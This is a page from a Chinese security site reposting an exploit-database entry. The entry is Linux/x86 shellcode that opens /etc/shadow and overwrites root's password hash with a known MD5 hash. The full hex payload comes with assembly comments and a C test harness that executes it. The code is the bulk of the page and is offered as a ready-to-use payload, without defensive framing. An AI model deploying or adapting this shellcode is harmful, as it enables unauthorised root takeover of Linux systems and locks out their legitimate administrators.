首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83 bytes 来源：Inj3ct0r.com 作者：agix 发布时间：2010-05-27   =============================================================== linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83 bytes =============================================================== /* | Title: Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83 Bytes | Description: replace root's password with hash of "agix" in MD5 | Type: Shellcode | Author: agix | Platform: Linux X86 */ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 1                  \ \____/ >> Exploit database separated by exploit   0 0                   \/___/          type (local, remote, DoS, etc.)    1 1                                                                      1 0  [+] Site            : Inj3ct0r.com                                  0 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 0                                                                      0 1                    ##################################                1 0                    I'm agix member from Inj3ct0r Team                1 1                    ##################################                0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #include <stdio.h> char shellcode[] = "\x31\xC9"                      //xor ecx,ecx "\x51"                          //push ecx "\x68\x61\x64\x6F\x77"          //push dword 0x776f6461 "\x68\x63\x2F\x73\x68"          //push dword 0x68732f63 "\x68\x2F\x2F\x65\x74"          //push dword 0x74652f2f "\x89\xE3"                      //mov ebx,esp "\x66\xB9\x91\x01"              //mov cx,0x191 "\x6A\x05" //push byte +0x5 "\x58" //pop eax "\xCD\x80"                      //int 0x80 "\x89\xC3"                      //mov ebx,eax "\xEB\x0D"                      //jmp short 0x30 "\x59"                          //pop ecx "\x6A\x20"                      //push byte +0x20 "\x5A"                          //pop edx "\xB0\xB5"                      //mov al, 0xb5 "\x6A\x08"                      //push byte +0x8 "\x5E"                          //pop esi "\x31\xFF"                      //xor edi,edi "\xCD\x80"                      //int 0x80 "\xE8\xEE\xFF\xFF\xFF"          //call 0x22 //db "IMMkmgi9$NuhPs1B8H5uz7kEOeKf2H1:" "\x49\x4D\x4D\x6B\x6D\x67\x69\x39" "\x24\x4E\x75\x68\x50\x73\x31\x42" "\x38\x48\x35\x75\x7A\x37\x6B\x45" "\x4F\x65\x4B\x66\x32\x48\x31\x3A"; int main(int argc, char **argv) {         int *ret;         ret = (int *)&ret + 2;         (*ret) = (int) shellcode; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·linux/x86 alphanumeric Bomb FO ·Flock web browser v2.5.6 (Remo ·Adobe Photoshop CS4 Extended 1 ·Adobe Photoshop CS4 Extended 1 ·Linux/x86 - Disable randomize ·Home FTP Server version 1.10.2 ·Open&Compact Ftp Server 1.2 Un ·FreeBSD 8.0 ftpd off-by one Po ·POC - SEH control (0day) of We ·YourArcadeScript v2.0b1 Blind ·Solaris/x86 - Remote Download ·HomeFTP Server r1.10.3 (build   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved